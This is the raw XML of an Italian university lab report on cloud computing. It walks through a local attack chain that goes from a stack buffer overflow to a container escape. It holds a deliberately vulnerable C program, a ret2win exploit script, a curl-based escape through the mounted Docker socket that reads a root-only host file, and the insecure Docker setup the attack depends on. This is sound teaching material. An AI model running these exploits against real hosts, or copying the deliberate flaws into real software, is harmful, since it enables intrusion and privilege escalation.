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34B6" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2400" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3D6D"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Laboratorio di Cloud Computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381806CE" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Da Buffer Overflow a Container Escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9DAC4" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Autore: Luisa Mele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA4115" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Anno accademico: 2025/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF9F17" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Data: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 ottobre</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028714BE" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13337958" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Obiettivo e scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2E0EA" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'esercitazione ha per oggetto l'isolamento dei container, i confini di sicurezza e le conseguenze degli errori di configurazione. Il laboratorio realizza, in modo riproducibile e confinato alla macchina locale, uno scenario di container </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> non banale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B477A" w14:textId="531E2AFB" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il punto di partenza </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> una vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00DE106B">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applicativa (uno </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> buffer overflow in un programma C) che fornisce una shell all'interno del container. Da quella shell, sfruttando una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfigurazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Docker montato nel container), l'attaccante evade verso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e legge un file leggibile solo a livello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>L'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> coinvolto </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la VM locale del Docker Engine. Nessun sistema esterno </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t>è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> coinvolto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831DE53" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2. Architettura del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AE92D" w14:textId="6C24A177" w:rsidR="00E4632A" w:rsidRDefault="00000000" w:rsidP="00105CE3">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il laboratorio </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">composto da un container applicativo e dal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dell'host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. La progressione dell'attacco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354020B7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Applicazione vulnerabile (buffer overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833DD40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-&gt; exploit ret2win: shell nel container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accesso al container]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BBD91B" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000" w:rsidP="00105CE3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   -&gt; abuso del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socket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Docker montato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escape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container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5984E08F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-&gt; lettura/scrittura come root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sull'host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condizione finale]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7C29C" w14:textId="739093DA" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Configurazione rilevante: il container monta /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>docker.sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; il binario vulnerabile </w:t>
      </w:r>
      <w:r w:rsidR="00105CE3">
        <w:t xml:space="preserve">è </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compilato senza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canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e senza PIE; il processo nel container gira come root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1D3C2" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>3. Struttura della consegna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59858155" w14:textId="77777777" w:rsidR="00E4632A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assignment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1BF7B22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|-- README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3BEB6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|-- report/relazione.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11183399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|--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environment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68802223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|   |--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Dockerfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16AA8357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|   `--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docker-compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="267D664A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|--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application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33C9FBE0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|   |--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vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66D095CB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   `-- app_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F6948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|-- scripts/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946D582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   |-- exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79BADD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   |-- escape.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02027393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|   |-- setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318863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|   |-- demo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE21EE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|   `-- cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C8B83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`-- references.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F310D" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4. File del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719A63A" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E0AC520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#include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&lt;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stdio.h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14:paraId="2E395676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#include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&lt;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stdlib.h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14:paraId="68B6ADD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#include &lt;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unistd.h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14:paraId="43378A5D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4C3DE4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void win(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293381D2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8080CF6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("\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+]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 shell nel container avviata\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E611A2" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3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fflush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stdout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03F4CA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system("/bin/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14:paraId="576C12C8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8196F6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2D2A538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void vulnerable(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56192C09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1EBB352E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buffer[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64];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3EC5F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"Inserisci il tuo nome: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFB701" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3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fflush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stdout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BDC679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read(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0, buffer, 256);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E2D7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printf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"Ciao, %s\n", buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A24D59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D7E2E7D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6CCA657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int main(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA3BABC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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F87CD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setvbuf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stdout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, NULL, _IONBF, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7749A494" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/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vulnerable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5F3BAB30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printf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"Programma terminato normalmente.\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F234029" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566111B3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4F0F1B1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4.2 application/app_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A750233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APP-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FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buffer_overflow_shell_in_container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5E20B69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4.3 scripts/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC8D6B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#!/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usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A0648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import struct, subprocess, sys,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</w:p>
    <w:p w14:paraId="123FCBC8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479600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BINARY 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os.path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.join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os.path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.dirname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os.path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.abspath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(__file__)), "vuln")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F665C2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if not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os.path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exists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BINARY):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA8CC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BINARY =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"./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vuln"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526854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OFFSET = 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2F0D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46E6D5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sym_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addr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binary, symbol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6507B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out 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subprocess.check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_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output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["nm", binary]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).decode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DE57C93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line in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out.splitlines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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8FAB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parts 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line.split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2FE79DE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len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(parts) == 3 and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parts[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2] == symbol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A20CDF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int(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parts[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0], 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4B24F" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/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sys.exit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(f"[!]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Simbolo '{symbol}'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non trovato in {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binary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}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC95EBC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442A9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ret_gadget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(binary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621AF1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out 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subprocess.check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_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output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["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objdump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", "-d", binary]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).decode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5475BA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line in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out.splitlines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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93DC07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"\tret" in line and ":" in line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CC187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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349086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return int(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line.split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(":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")[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0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].strip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(), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3046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except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ValueError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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D69E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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B434C1" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/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sys.exit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("[!] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Nessun gadget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' trovato")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5758C3A7" w14:textId="77777777" w:rsidR="00E4632A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356C67F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def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main(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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3309AE0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win =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sym_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addr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BINARY, "win")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566561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 =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ret_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gadget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BINARY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120109B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sys.stderr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.write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(f"[*]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win(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      = {hex(win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)}\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n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDDAFA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sys.stderr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.write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(f"[*] ret gadget = {hex(ret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)}\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n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA795A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sys.stderr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.write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(f"[*] offset     = {OFFSET}\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24B2D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payload  =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b"A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 * OFFSET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED71C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payload +=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struct.pack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("&lt;Q", ret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532449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payload +=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struct.pack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("&lt;Q", win)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F482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payload  =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payload.ljust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(256,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b"A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FECE97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len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sys.argv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 &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77483DF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with open(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sys.argv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[1], "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rb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 as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DEEA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payload +=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f.read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F39E9F7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sys.stdout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buffer.write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(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD18C6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41037BC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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB00B2F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main(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25A9E304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4.4 scripts/escape.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176DB3C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#!/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bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C54AE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echo "[stage1] shell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nel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container come: $(id)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7BCBC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echo "[stage1] flag container-local:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7079C6" w14:textId="77777777" w:rsidR="00E4632A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/app_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC75F9" w14:textId="77777777" w:rsidR="00E4632A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"[stage2a] lettura diretta della flag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(atteso: errore):"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646B183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cat /host_flag_secret.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114E9B3" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:rPr>
          <w:lang w:val="sv-SE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>echo "[stage2b] escape via socket Docker:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A563C36" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:rPr>
          <w:lang w:val="sv-SE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>SOCK=/var/run/docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3950C8B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API=http://localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B302FC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CID=$(curl -s -XPOST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unix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-socket "$SOCK" -H 'Content-Type: application/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json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' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5BA5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-d '{"Image":"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alpine:latest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","Cmd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":[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"cat","/host/host_flag_secret.txt"],"Tty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":true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,"HostConfig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":{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"Binds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":[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"/:/host"]}}' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA556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"$API/containers/create" | python3 -c 'import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sys,json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;print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json.load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sys.stdin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)["Id"])' 2&gt;/dev/null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA1F70" w14:textId="77777777" w:rsidR="00E4632A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[ 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z "$CID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 ]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"[!] creazione container fallita"; exit 1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; }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CF4E42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curl -s -XPOST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unix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-socket "$SOCK" "$API/containers/$CID/start" &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2800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curl -s -XPOST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unix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-socket "$SOCK" "$API/containers/$CID/wait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  &gt;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/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7156FCD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curl -s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unix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-socket "$SOCK" "$API/containers/$CID/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logs?stdout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=1&amp;stderr=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E8B97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curl -s -XDELETE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unix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-socket "$SOCK" "$API/containers/$CID" &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADDE6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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663AA269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4.5 environment/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7275736D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FROM debian:12-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA224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31618CB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RUN apt-get update &amp;&amp; apt-get install -y --no-install-recommends \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FB4D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gcc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libc6-dev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binutils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python3 curl ca-certificates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gdb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\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20A9D26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&amp;&amp; rm -rf /var/lib/apt/lists/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9B70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FEE3EF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WORKDIR /lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2338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3B01C9C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COPY application/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vuln.c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/lab/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vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26466098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COPY scripts/exploit.py       /lab/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F46B7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COPY scripts/escape.sh        /lab/escape.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC135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COPY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application/app_flag.txt  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app_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FD44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014FFE3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RUN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gcc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fno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-stack-protector -no-pie -g -O0 -o /lab/vuln /lab/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vuln.c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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D93E7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chmod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+x /lab/vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DCF3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5744608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CMD ["sleep", "infinity"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75370CAD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4.6 environment/docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BEE448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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8D13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lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F8F83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build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45016E94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context: ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62FC035F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dockerfile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: environment/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Dockerfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="791A4B0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image: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bof-escape-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lab:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00BCF42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container_name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bof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-escape-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF6763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stdin_open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: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E3E6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tty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: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C909D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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794D4C3" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:rPr>
          <w:lang w:val="sv-SE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</w:t>
      </w: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>- /var/run/docker.sock:/var/run/docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B33540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4.7 scripts/setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0EAE1F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#!/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usr/bin/env bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A94E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set 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euo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pipefail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D6E6FB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HERE="$(cd "$(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dirname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"$0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")/..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" &amp;&amp;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pwd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)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1134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docker pull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alpine:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A0E5DFE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docker run --rm -v /:/host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alpine:latest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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438BE2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'echo "HOST-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FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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docker_socket_mount_equals_root_on_host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}" &gt; /host/host_flag_secret.txt &amp;&amp;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chmod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600 /host/host_flag_secret.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2BE3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 compose -f "$HERE/environment/docker-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compose.yml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 up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A765A5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4.8 scripts/demo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F350D8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#!/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usr/bin/env bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971498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set 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uo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pipefail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A1DCE4D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HERE="$(cd "$(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dirname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"$0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")/..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" &amp;&amp;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pwd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)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480442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CF="$HERE/environment/docker-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compose.yml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14:paraId="77C3606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docker compose -f "$CF" exec -T lab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'cd /lab &amp;&amp; echo "Mario"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| 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/vuln'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55961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docker compose -f "$CF" exec -T lab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'cd /lab &amp;&amp; python3 exploit.py escape.sh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| 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/vuln'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776C18B7" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:spacing w:before="160" w:after="80"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105CE3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.9 scripts/cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD2A4E" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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#!/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usr/bin/env bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734CB5B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set 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uo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pipefail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60E352D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HERE="$(cd "$(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dirname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"$0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")/..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" &amp;&amp;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pwd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)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BECFE29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 compose -f "$HERE/environment/docker-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compose.yml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" down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rmi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local -v || true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF2365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docker run --rm -v /:/host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alpine:latest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'rm -f /host/host_flag_secret.txt' || true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D8B86" w14:textId="77777777" w:rsidR="00E4632A" w:rsidRPr="00105CE3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
